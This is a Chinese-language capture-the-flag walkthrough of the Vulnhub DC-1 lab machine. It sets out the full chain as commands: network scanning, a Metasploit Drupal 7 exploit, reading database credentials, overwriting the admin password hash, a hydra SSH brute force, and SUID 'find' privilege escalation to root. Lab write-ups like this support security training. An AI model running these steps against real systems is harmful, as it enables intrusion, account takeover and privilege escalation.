Vulnhub-DC-1
1、虚拟机:vmware 15.5.6
2、攻击环境:kali linux 2020.3 192.168.143.128
3、靶机:DC-1
靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。
一、攻击过程
一、主机存活扫描
arp-scan -l
探测到目标ip:192.168.143.134
二、端口扫描
namp -A -p- 192.168.143.134
扫描到以下端口以及服务
22端口——ssh服务
80端口——http服务
三、漏洞探测
nmap --script=vuln 192.168.143.134
探测到Drupal 7 版本存在漏洞
四、漏洞攻击
msfconsole
打开msfconsole
search drupal 7
搜索drupal 7 漏洞,显示有最新的2018版,而且效果很棒。
use 4(定位到攻击载荷4)
set rhosts 192.168.143.134(设定靶机IP)
exploit(开始攻击)
shell
#(得到shell)
python -c "import pty;pty.spawn('/bin/bash')"
#(Python 交互shell脚本,数据库只允许本地连接,我们需要一个shell)
ls -al
(查看所有文件可以看到有flag1)
cat flag1.txt
打开flag1.txt 得到提示CMS配置文件的提示,百度drupal配置文件信息
cat sites/default/settings.php
打开配置文件得到flag2
提示爆破与字典不是唯一的方法,同时给出了数据库的相关信息。
mysql -u dbuser -p #(登入数据库。输入密码)
show databases;#(显示所有数据库名)
use drupaldb#(定位drupaldb数据库)
show tables;#(显示当前数据库的所有表)
探测到有用的表——>users
select * from users;
查看users表内容,发现用户名admin,但密码是一段hash值,难以破解。这里直接替换掉它
cd ..
./scripts/password-hash.sh daoyuan
用script脚本生成daoyuan的hash密码
update users set pass="$S$DxFoVcv5JJYjcK/pu4PLBq74qKW/ZCQKFMYcsSPadKFI9ms9K.gR" where uid=1;
用新密码生成的hash值覆盖原有密码
登入网页发现flag3,提示passwd,联想passwd文件
cat etc/passwd
打开passwd文件发现有账户flag4,之前端口扫描发现22端口已经开启
这里用ssh远程登入,但不知道密码
尝试用hydra爆破一下
字典用自带的rockyou.txt
进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:
gzip -d rockyou.txt.gz
复制txt到root目录下
hydra -l flag4 -P rockyou.txt 192.168.143.134 ssh
得到密码orange,可以ssh远程登入了
ssh flag4@192.168.143.134 -p 22
密码orange
得到flag4 ,提示root,我们这里是www用户,权限很低,root就是暗示提权
find / -type f -perm -u=s 2>/dev/null
查找靶机可执行的二进制文件,找到了find的suid权限.
touch 1
find 1 -exec "/bin/sh" \;
cd /root
cat thefinalflag.txt
find提权,得到最后的flag
至此,5个flag已经全部找出!
如有错误,烦请不吝赐教。
转载请注明出处!